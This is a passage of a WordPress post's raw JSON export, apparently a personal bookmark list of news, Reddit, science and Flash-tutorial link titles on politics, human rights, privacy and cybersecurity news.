New Video Shows Beverly Hills Cops Playing Beatles to Trigger Instagram Copyright Filter : stupidpol<\/a><\/dt>\n
3D Interactive Earth Globe<\/a><\/dt>\n
MeteoEarth.com – Interactive 3D globe brings weather to life<\/a><\/dt>\n
ALAN BECKER – Flash Basics (revamped) – YouTube<\/a><\/dt>\n
Macromedia flash pro 8 buttons tutorial – YouTube<\/a><\/dt>\n
How To Easily Make A Button In Flash CS5 – YouTube<\/a><\/dt>\n
Flash Tutorial: Play Stop Toggle Button Using Code Snippets – YouTube<\/a><\/dt>\n
Flash Tutorial: Play Pause Toggle Button with actionscript 3; cs5 \/ cs5.5 – YouTube<\/a><\/dt>\n
How to create a HTML 5 button using Adobe Animate – YouTube<\/a><\/dt>\n
Adobe Animate CC 2020 – click event tutorial – JavaScript in HTML5 canvas – YouTube<\/a><\/dt>\n
\u2018Radio stations in South Sudan practice self-censorship\u2019-Sama FM boss | Radio Tamazuj<\/a><\/dt>\n
AP Style and Textbroker | Textbroker Blog<\/a><\/dt>\n
Nigeria emerges as Africa\u2019s primary export hub for ivory, pangolin scales<\/a><\/dt>\n
A South Sudan columnist – Reuters<\/a><\/dt>\n
Facebook is reportedly building a smartwatch and wants to sell it to you starting next year in exchange for your health data : privacy<\/a><\/dt>\n
The book burnings have begun. And by a librarian no less. \u201cProtest Leader Cameron Williams Fired From Library For Removing Conservative Books And Burning Them\u201d : stupidpol<\/a><\/dt>\n
An assassination plot against India’s PM sent a bunch of of his critics to jail. A recent WashingtonPost report revealed that evidence was allegedly planted in a Windows laptop by an attacker. A Remote Access Trojan(RAT) was used to plant documents. Are such attacks possible in Linux & Mac too? : cybersecurity<\/a><\/dt>\n
Venezuela, Spain Expel Ambassadors | Venezuelanalysis.com<\/a><\/dt>\n
EU \u2018Cannot Remain Indifferent\u2019 to Western Sahara Developments<\/a><\/dt>\n
Which Countries Are Allowed to Use Facebook Ads?<\/a><\/dt>\n
Project Wave: Exposed media corruption scandalises South Africa | The Listening Post – YouTube<\/a><\/dt>\n
Ethiopia Columns | Reuters.com<\/a><\/dt>\n
Viewpoint: Why Ethiopia and Sudan have fallen out over al-Fashaga<\/a><\/dt>\n
Oregon warns math is racist, promotes program for teachers to dismantle its “white supremacy” : stupidpol<\/a><\/dt>\n
Cyber Security in Myanmar : cybersecurity<\/a><\/dt>\n
Hong Kong: alarm over proposed law that could ban anyone from leaving : law<\/a><\/dt>\n
Former Miss Oaxaca 2018, Laura Mojica is arrested for alleged crimes of kidnapping in Mexico with 7 others : worldevents<\/a><\/dt>\n
Add reddit user<\/a><\/dt>\n
Alex de Waal | The Fletcher School<\/a><\/dt>\n
Despite Scanning Millions of Faces, Feds Caught Zero Imposters at Airports Last Year – U.S. Customs and Border Protection scanned more than 23 million people in public places with facial recognition technology in 2020 : privacy<\/a><\/dt>\n
Myanmar coup: Protesters face up to 20 years in prison under new law : worldevents<\/a><\/dt>\n
Former Russian journalist Ivan Safronov, held for seven months on high treason charges, told to try to \u2018recall\u2019 any misdemeanours : Journalism<\/a><\/dt>\n
Italy fines Facebook \u20ac7M for repeated data violations : privacy<\/a><\/dt>\n
A man in Scotland was arrested for a tweet celebrating the death of a public figure. Meanwhile in America… : FreeSpeech<\/a><\/dt>\n
Why is Ethiopian Airlines so Successful ? The Real Story behind the Best Airline in Africa – YouTube<\/a><\/dt>\n
Dominic Ongwen: ICC conviction of former child soldier establishes ‘forced pregnancy’ as a war crime : internationallaw<\/a><\/dt>\n
Hong Kong government mulls legislation prohibiting insult of public officials, local media reports. : humanrights<\/a><\/dt>\n
Academics turn RAM into Wi-Fi cards to steal data from air-gapped systems : cybersecurity<\/a><\/dt>\n<\/dl>\n

Jan 20<\/p>\n

Should we recognize privacy as a human right? : Futurology<\/a><\/p>\n

How many of you enjoy being journalists? : Journalism<\/a><\/dt>\n
Noor Hossain and the image that helped bring down a dictator – BBC News<\/a><\/dt>\n
Human Rights | Thomson Reuters Foundation<\/a><\/dt>\n
Top 100 World News RSS Feeds<\/a><\/dt>\n
Party supporters shift views to match partisan stances – The Academic Times<\/a><\/dt>\n
We hear what we expect to hear — ScienceDaily<\/a><\/dt>\n
latin america facts – Google Search<\/a><\/dt>\n
Did Ethiopia’s attack on Tigray violate international laws?<\/a><\/dt>\n
The Government\u2019s New \u201cWar on Terror\u201d is Coming \u2014 This Time It\u2019s Aimed at America – Patriot Rising<\/a><\/dt>\n
The forest-builders of India\u2019s Shivaliks | Human Rights News | Al Jazeera<\/a><\/dt>\n
USA: Right the wrong: Decision time on Guant\u00e1namo | Amnesty International<\/a><\/dt>\n
Report – AMR5134742021ENGLISH.PDF<\/a><\/dt>\n
Patriot Act 2.0 : Prepare For the New \u201cDomestic Terrorism Bill\u201d – Patriot Rising<\/a><\/dt>\n
Arizona Supreme Court Rules Cops don’t need a warrant to get information from internet providers. : privacy<\/a><\/dt>\n
Explained: China’s Belt and Road Initiative, US trying to counter – Business Insider<\/a><\/dt>\n
Venezuela on the brink of a major humanitarian collapse : venezuela<\/a><\/dt>\n
List of political subreddits. : redditlists<\/a><\/dt>\n
overview for D0T1X<\/a><\/dt>\n
Shades of pink – Wikipedia<\/a><\/dt>\n
Ken Paxton is only state attorney general in the U.S. who didn\u2019t sign letters condemning Capitol insurrection : law<\/a><\/dt>\n
National Guard at Capitol Authorized to Use Lethal Force in Aftermath of Mob : politics<\/a><\/dt>\n
LIST OF MEDIA THINGS Media Analysis and Criticism<\/a><\/dt>\n
Los grandes personajes de la historia – Canal de Historia.pdf<\/a><\/dt>\n
Nice looking website<\/a><\/dt>\n
Mexico\u2019s Left-Wing President: \u201cYes, social media should not be used to incite violence and all that, but this cannot be used as a pretext to suspend freedom of expression.\u201d : FreeSpeech<\/a><\/dt>\n
\u201cMy phone is listening in on my conversations\u201d is not paranoia but a legitimate concern, study finds. Eavesdropping activity may not be detected by current security mechanisms, and could even be conducted via motion sensors (accessible to third-party apps without user permission in iOS and Android). : cybersecurity<\/a><\/dt>\n
U.S. Rep Boebert Blocks Constituent on Twitter; Could a Lawsuit be Next?<\/a><\/dt>\n
Daniel Ellsberg: \u201cWhatever Julian Assange is guilty of, I\u2019m guilty of.\u201d : julianassange<\/a><\/dt>\n
The Geopolitics of Tajikistan : PoliticalScience<\/a><\/dt>\n
Sticky webpage element Scroll-Then-Fix Content | CSS-Tricks<\/a><\/dt>\n
Search Box in Content Moves to Fixed Header<\/a><\/dt>\n
Uyghurs in Turkey fear China is leveraging its Covid-19 vaccine to have them deported to Xinjiang : humanrights<\/a><\/dt>\n
When authorities break into a phone with the cellebrite device or something similar are they cracking full disk encryption, just going around it with some backdoor or do they have the encryption master keys? What is going on? : cybersecurity<\/a><\/dt>\n
People high in trait machiavellianism are more likely to climb the corporate ladder by leaving lasting impressions with influential people in leadership positions, mostly through an ability to capitalize on social situations and expand their networks. : science<\/a><\/dt>\n
In a series of 6 studies across 4 countries, test subjects tend to cast women as victims and men as perpetrators, as well as assume that women suffer more harm and men deserve harsher punishments, when assessing differently-gendered but otherwise identical scenarios of workplace conflict : science<\/a><\/dt>\n
When Americans are primed to think about their own family history, they become more supportive of open immigration policies and hold more favorable views of immigrants. : science<\/a><\/dt>\n
Hydrogen derived from basaltic rocks can support microbial life in the absence of sunlight, a study finds. : science<\/a><\/dt>\n
Time feels like it slows down when you are concealing something. Past research has shown that time flies when having fun, but no research has looked at time perception when lying. When concealing something, time feels like it passes more slowly, because of an aroused and highly vigilant state. : science<\/a><\/dt>\n
The discovery of dozens of new Roman Army sites thanks to remote sensing technology has revealed more about one of the empire’s most infamous conflicts. It shows the Roman army had a larger presence in the region than previously thought during the 200-year battle to conquer the Iberian Peninsula. : science<\/a><\/dt>\n
Study sheds new light on how the brain distinguishes speech from noise. Researchers provide the first physiological evidence that a foundational center of the brain influences how sound is processed, identify a previously unknown neural circuit. : science<\/a><\/dt>\n
Analysis of journal articles from 145 journals, 740K reviewers, 1.7m authors finds no evidence of bias against women in the peer-review process. Results showed that manuscripts written by women as solo authors or coauthored by women were treated even more favorably by referees and editors. : science<\/a><\/dt>\n
New study suggests early humans could hibernate, but not very well : science<\/a><\/dt>\n
Early humans may have survived the harsh winters by hibernating : science<\/a><\/dt>\n
New study shows contractual texts written in ALL-CAPS hinder comprehension, yet they remain in use; older people are 29% more likely to misunderstand all-caps text : science<\/a><\/dt>\n
Feelings of gratitude motivate people to maintain romantic relationships. People automatically evaluated romantic partners who expressed gratitude more favorably and thus became more committed; however, if romantic partners did not reciprocate such gratitude, they became less committed. : science<\/a><\/dt>\n
Researchers in Japan have made the first observations of biological magnetoreception \u2013 live, unaltered cells responding to a magnetic field in real time. This discovery is a crucial step in understanding how animals from birds to butterflies navigate using Earth\u2019s magnetic field. : science<\/a><\/dt>\n
Grandiose narcissists often emerge as leaders, but they are no more qualified than non-narcissists, and have negative effects on the entities they lead. Their characteristics (grandiosity, self-confidence, entitlement, and willingness to exploit others) may make them more effective political actors. : science<\/a><\/dt>\n
When a romantic partner is very responsive on some days and very unresponsive on other days, it can lead to more attachment issues than if the partner had average responsiveness – the first empirical evidence that responsiveness variability predicts attachment anxiety in romantic relationships. : science<\/a><\/dt>\n
The lack of respect and open-mindedness in political discussions may be due to affective polarization, the belief those with opposing views are immoral or unintelligent. Intellectual humility, the willingness to change beliefs when presented with evidence, was linked to lower affective polarization. : science<\/a><\/dt>\n
US states that rely on private prisons incarcerate more people for longer periods of time, according to a first-of-its-kind study that establishes a causal connection between private prisons and incarceration. : science<\/a><\/dt>\n<\/dl>\n","protected":false},"excerpt":{"rendered":"

Feb 21 Facebook cuts Australia off from the world : privacy Tech Companies Are Limiting Use Of Facial Recognition By Law Enforcement : privacy Academics turn RAM into Wi-Fi cards to steal data from air-gapped systems | ZDNet Judge refuses to ban Capitol riot suspect from Twitter and Facebook : law Bookmarks 2021 \u2013 NewsStandard … Read more<\/a><\/p>\n","protected":false},"author":6,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-5126","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"_links":{"self":[{"href":"https:\/\/newsstandard.ca\/wp-json\/wp\/v2\/posts\/5126","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/newsstandard.ca\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/newsstandard.ca\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/newsstandard.ca\/wp-json\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/newsstandard.ca\/wp-json\/wp\/v2\/comments?post=5126"}],"version-history":[{"count":4,"href":"https:\/\/newsstandard.ca\/wp-json\/wp\/v2\/posts\/5126\/revisions"}],"predecessor-version":[{"id":5179,"href":"https:\/\/newsstandard.ca\/wp-json\/wp\/v2\/posts\/5126\/revisions\/5179"}],"wp:attachment":[{"href":"https:\/\/newsstandard.ca\/wp-json\/wp\/v2\/media?parent=5126"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/newsstandard.ca\/wp-json\/wp\/v2\/categories?post=5126"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/newsstandard.ca\/wp-json\/wp\/v2\/tags?post=5126"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}